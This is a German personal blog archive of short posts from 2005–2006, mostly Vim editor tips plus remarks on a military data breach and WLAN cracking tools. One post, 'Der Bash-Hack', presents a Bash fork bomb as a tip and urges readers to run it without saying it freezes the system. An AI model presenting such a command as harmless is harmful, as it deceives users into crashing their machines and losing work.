Stellwag.eu » (Dirty) Hacks

Hacking Pentagon … done.

Phil — Wed, 03 May 2006 18:41:05 +0000

Heise berichtet darüber, dass es unbekannten Hackern gelungen ist, in den Rechnerverbund des Krankenhaussystems des US-Militärs TRICARE einzubrechen und 14.000 Kreditkarten- und Sozialversicherungsnummern, privaten Anschriften und Telefonnummern sowie von dienstlichen Durchwahlen und E-Mail-Adressen zu stehlen.

Aus der Stellungsnahme des Pentagons geht hervor, dass die betroffenen Personen informiert worden sind und dass die Sicherheitsstufe des Rechnerverbunds mit den privaten Dateninhalten erhöht worden sei.

Also _ich_ als Betroffener, würde so etwas tierisch ärgern!!!

Aircrack mit Hardware-Unterstützung

Phil — Mon, 06 Mar 2006 12:36:17 +0000

Jeder hat es schon einmal gelesen oder vielleicht sogar schon auprobiert. Die Rede ist von Aircrack.

Nun habe ich gerade auf heise mobil gelesen, dass es einen WLAN-Detektiv von der Firma Trendnet gibt. Die Frage dabei ist eher die der legalen Nutzungsmöglichkeit . Denn dieser 50 EUR teuere und USB-Stick große WLAN-Detektiv soll WLAN-Netze mit Leichtigkeit aufspüren können. Fehlt nur noch der Werbesologan: “Hacking with ease!“

Der Bash-Hack

Phil — Mon, 30 Jan 2006 20:59:12 +0000

Jeder der unter Linux/Unix die Bash als Standard-Shell verwendet, sollte das hier mal ausprobieren:

:() { :& :& } ;:

Einfach in die Komandozeile (Bash) eingeben und [ENTER] drücken. Danach könnt ihr mal euere Erfahrungen posten…

Fehlende Kompatibilität

Phil — Wed, 18 Jan 2006 21:56:11 +0000

Man merkt es immer wieder, egal ob es sich nun um Link-Listen dreht, die man zwischen unterschiedlichen Browsern austauschen oder auch nur ein OpenOffice (OpenDocument) Dokument unter Microsoft Word öffnen will, man hat bei unterschiedlichen Systemen immer wieder das Problem der fehlenden Kompatibilität.

Dabei bietet XML & Co. doch so viele Möglichkeiten, auch auf unterschiedlichen Systemen Kompatibilität zu bieten. Ich stehe gerade vor dem Problem ungefähr 100 Blog-Einträge aus meinem vorherigen Typo3-System übernehmen zu wollen, weil sie sonst – ganz banal gesagt – einfach nicht mehr aufrufbar wären Aber aufgrund der fehlenden Kompatibilität darf ich das ganze jetzt wohl in mühevoller Handarbeit – Eintrag für Eintrag – in das neue System überführen *grrr*.

Ich bin schlichtweg dafür, für Blog-Einträge eine ISO-Norm aufzustellen, wie diese in einem RDBS abzuspeichern sind

HACK #9: Einrücken und neu Formatieren

Phil — Wed, 02 Nov 2005 14:26:54 +0000

Da es in letzter Zeit etwas still um meine VIM-Hacks geworden ist, werde ich heute und jetzt die Nr. 9 der Reihe vorstellen.

Wer kennt das nicht, man hat einen Text, der in reinem ASCII geschrieben ist und der irgendwie nicht sinnvoll eingerückt ist. Dort wurden 3 Leerzeichen zum Einrücken verwendet, hier wieder 2 Tabulatoren und dort wurde wiederrum falsch eingerückt.

Alles in allem könnte man sicherlich auch reguläre Ausdrücke in VIM verwenden, um dem Formatierungsproblem entgegen zu wirken. Es gibt aber einen weitaus schnelleren und effektiveren Weg:

Machen Sie einfach eine solche wüst formatierte ASCII-Datei auf und geben (ohne vorangestellten ‘:’) ein

ggVG=

ein. Mit “ggVG” markieren sie den gesamten Text zeilenweise und mit dem ‘=’ setzen Sie den Formatierungen ein Ende, indem alles zurückgesetzt wird.

HACK #10: {En,De}cryption

Phil — Wed, 02 Nov 2005 12:16:10 +0000

Eine wahrscheinlich nicht so häufig genutzte Funktion in VIM wird wohl die Encryption sein. Dazu möchte ich vorab schon erwähnen, dass die Methode ASCII-Files zu verschlüsseln in VIM nicht wirklich sicher ist. Dazu möchte ich auch auf den folgenden Auszug aus der Hilfe “:help encryption” eingehen:

[CUT]
9. Encryption

Vim is able to write files encrypted, and read them back. The encrypted text cannot be read without the right key.

Note: The swapfile and text in memory is not encrypted. A system
administrator will be able to see your text while you are editing it.
When filtering text with “:!filter” or using “:w !command” the text is not
encrypted, this may reveal it to others.

WARNING: If you make a typo when entering the key and then write the file and exit, the text will be lost!

The normal way to work with encryption, is to use the “:X” command, which will ask you to enter a key. A following write command will use that key to encrypt the file. If you later edit the same file, Vim will ask you to enter a key. If you type the same key as that was used for writing, the text will be readable again. If you use a wrong key, it will be a mess.

:X Prompt for an encryption key. The typing is done without showing the actual text, so that someone looking at the display won’t see it. The typed key is stored in the ‘key’ option, which is used to encrypt the file when it is written. The file will remain unchanged until you write it. See also |-x|.

The value of the ‘key’ options is used when text is written. When the option is not empty, the written file will be encrypted, using the value as the encryption key. A magic number is prepended, so that Vim can recognize that the file is encrypted.

To disable the encryption, reset the ‘key’ option to an empty value:

:set key=

When reading a file that has been encrypted and this option is not empty, it will be used for decryption. If the value is empty, you will be prompted to enter the key. If you don’t enter a key, the file is edited without being decrypted.

If want to start reading a file that uses a different key, set the ‘key’ option to an empty string, so that Vim will prompt for a new one. Don’t use the “:set” command to enter the value, other people can read the command over your shoulder.

Since the value of the ‘key’ option is supposed to be a secret, its value can never be viewed. You should not set this option in a vimrc file.

An encrypted file can be recognized by the “file” command, if you add this line to “/etc/magic”, “/usr/share/misc/magic” or wherever your system has the “magic” file:

0 string VimCrypt~ Vim encrypted file
Notes:

Encryption is not possible when doing conversion with ‘charconvert’.

Text you copy or delete goes to the numbered registers. The registers can be saved in the .viminfo file, where they could be read. Change your ‘viminfo’ option to be safe.

Someone can type commands in Vim when you walk away for a moment, he should not be able to get the key.

If you make a typing mistake when entering the key, you might not be able to get your text back!

If you type the key with a “:set key=value” command, it can be kept in the history, showing the ‘key’ value in a viminfo file.

There is never 100% safety. The encryption in Vim has not been tested for robustness.

The algorithm used is breakable. A 4 character key in about one hour, a 6 character key in one day (on a Pentium 133 PC). This requires that you know some text that must appear in the file. An expert can break it for any key. When the text has been decrypted, this also means that the key can be revealed, and other files encrypted with the same key can be decrypted.

Pkzip uses the same encryption, and US Govt has no objection to its export. Pkzip’s public file APPNOTE.TXT describes this algorithm in detail.

Vim originates from the Netherlands. That is where the sources come from.

Thus the encryption code is not exported from the USA.
[/CUT]

Steht eigentlich alles drinnen was man wissen muss. Wie man die Verschlüsselung umgeht werde ich evtl. in einem späteren Hack erklären…

So long…

siggen v2.00 steht kurz vor der Veröffentlichung!

Phil — Thu, 25 Aug 2005 14:49:24 +0000

Das Open Source Signatur-Projekt siggen steht kurz vor der Veröffentlichung. Es wird von der Version 1.27b auf der Version 2.00 (im Stable-Branch) upgedatet. Grund dafür ist eine neue Programmiersprache, mit der man seine Email-Signaturen verschlüsseln lassen kann: Die *NIX Shell!

Damit ist es mit dem neuen siggen Feature möglich, sogar sed mit einem core dump abstürzen zu lassen – man brauche gerade einmal eine Signatur mit gut 1500 Zeichen Länge generieren und ausführen zu lassen!

Um aber RFC-konforme Email Signaturen zu erstellen(!!!), empfehle ich eine max. unverschlüsselte Signaturlänge von max. 12 Zeichen!

Have much fun …

HACK #8: VIM Bookmarks & References

Phil — Wed, 24 Aug 2005 12:29:35 +0000

Heute habe ich mir einmal gedacht, dass es u.U. vielleicht sinnvoll sein könnte, Sie auf ein paar gute Bookmarks und Referenzen im Internet über den OSS-Editor VIM hinzuweisen.

Eins möchte ich vorab aber noch erwähnen! Die untere Liste ist keinesfalls vollständig und wahrscheinlich sind auch die Inhalte (von denen ich mich hier ausdrücklich disdanziert habe!!!) teilweise fehlerbehaftet. Da ich über so eine große Liste keineswegs den Überblick behalten kann, bitte ich dead Links zu entschuldigen und wäre über einen kurzen Hinweis/Kommentar sehr dankbar!

Hier ein paar gute Dokumente, die auf meiner Seite gehostet sind:

Ein freies, englisches Buch, dass sehr ausführlich auf über 500 Seiten den VIM vorstellt:
FILE: Vimbook (OPL) (3.7 M)

Das hier ist ein ASCII-Dokument, das einige sehr interessante Hacks darstellt. Die Beschreibung ist allerdings sehr knapp gehalten:
FILE: VIM HACKS (34 K)

===== BOOKMARKS BEGIN =====

Der Editor Vi(m): Einführung, Tipps und Tricks
Bookmark: http://www.ostc.de/vi.pdf

Calmar’s Vim tips
Bookmark: http://www.calmar.ws/vim/index.php

Peter’s Vim Blogger
Bookmark: http://www.petersblog.org/taxonomy/term/10

Vim Color Editor HOW-TO (Vi Improved with syntax color highlighting)
Bookmark: http://dufo.tugraz.at/mirror/linux-html-howtos/Vim-HOWTO.html

Vim as XML Editor
Bookmark: http://www.pinkjuice.com/howto/vimxml/

The Docs
Bookmark: http://vimdoc.sourceforge.net/

The Vi IMproved Editor Web Ring
Bookmark: http://u.webring.com/hub?ring=vim

Vim Tips
Bookmark: http://vim.sourceforge.net/tips/

VI Lover’s Homepage
Bookmark: http://thomer.com/vi/vi.html

ausführliche Vim-Beschreibung bei Wikipedia (DE)
Bookmark: http://de.wikipedia.org/wiki/Vim

VIM (Vi IMproved) Tutorial
Bookmark: http://www.unb.ca/documentation/UNIX/tips/vim/

VIM Referenzkarte (DE)
Bookmark: http://www.linuxsource.de/download/vim_referenz.pdf

Vorteile des Vim
Bookmark: http://www.moolenaar.net/vim.html

Text Processing With Integrated Spell Checking and Paragraph Formatting in the Vim and Vi Editors
Bookmark: http://www.highley-recommended.com/text-processing.html

Vim und Reguläre Ausdrücke (sehr gut und umfangreich)
Bookmark: http://www.troubleshooters.com/linux/presentations/
leap_regex/toc.html

Vim for Beginners, with scripts, spell checkers, …
Bookmark: http://www.unb.ca/fredericton/science/chem/ajit/vim.htm

Another good Vim tutorial site
Bookmark: http://users.skynet.be/antoine.mechelynck/vim/

TVO: The Vim Outliner
Bookmark: http://bike-nomad.com/vim/vimoutliner.html

An Introduction to Display Editing with Vi
Bookmark: http://docs.freebsd.org/44doc/usd/12.vi/paper.html

Interview with Bill Joy
Bookmark: http://www.cs.pdx.edu/~kirkenda/joy84.html

Power Vim Usage: Tips & Tricks for Everyday Editing
Bookmark: http://www.ukuug.org/events/linux2004/programme/paper-SMyers/
Linux_2004_slides/vim_tips/index.html

===== BOOKMARKS END =====

Viel Spaß beim Schmökern durch die VIM-Informationen!

HACK #7: VIM als Taschenrechner!

Phil — Tue, 23 Aug 2005 12:45:31 +0000

Hatten Sie schon einmal das Problem, dass Sie etwas geschrieben haben und dann schnell etwas rechnen mussten, dass Sie vielleicht nicht im Kopf machen wollten/konnten. In VIM ist das kein Problem, dann er kann rechnen (-:

Ein wieder ganz intuitives *fg* [STRG] + [r] + [=] im “insert mode” des VIM und Sie können z. B. folgendes ausrechnen lassen:

5*5+1-1*12/6+4*6-0*3

Aber im Kopf hätten Sie wahrscheinlich auch nichts anderes herausbekommen als 48!

VORSICHT: VIM zeigt nur ganzzahlige Werte an!

HACK #6: Fensterteilung im improved VI

Phil — Tue, 23 Aug 2005 12:08:26 +0000

Eine sehr gute Methode, wenn man unter Unix/Linux mehrere Konfigurationsdateien editieren muss, mehrere Emails quasi-gleichzeitig schreiben oder einfach nur mehrere Sourcecode Dateien nebeneinander offen haben will bietet VIM mit der integrierten Fensteraufteilung.

Nehmen Sie an, Sie hätten 2 Dateien “file1.txt” und “file2.txt” im Ordner /tmp/myfiles liegen. Nun möchten Sie aus “file2.txt” etwas lesen, dass Sie dann in “file1.txt” übernehmen möchten. Dazu öffnen wir zuerst einmal Beide:

# vim /tmp/myfiles/file{1,2}.txt
2 files to edit

Nun können Sie entweder mit

:file file2.txt

bzw. mit

:file file1.txt

zwischen den 2 Dateien hin- und herspringen, oder Sie splitten die 2 Dateien. Hierzu haben Sie 2 Möglichkeiten, die Fenster zu splitten! Endweder horizontal mit:

:split file1.txt

oder eben vertikal mit dem folgendem VIM-Command:

:vsplit file1.txt

Nun fragen Sie sich sicherlich, wie man zwischen den 2 gesplitteten Fenstern hin- und herschalten kann! Dies machen Sie ganz intuitiv (-; mit [STRG] + [w] + [w] (also 2 mal ein kleines ‘w’).

TIPP: Sie können das Fenster auch mehrmals splitten, nicht nur in 2 Fenster, wie das obige Beispiel zeigt!

Wenn Sie nun eins der Fenster schließen wollen, können Sie dies machen, indem Sie den Befehl

:close

in dem zu schließenden Fenster anwenden. Mit dem Schlüsselwort

nly

sagen Sie VIM, dass er nur das i. M. aktive Fenster offen behalten soll, alle anderen, offenen Fenster werden dann geschlossen.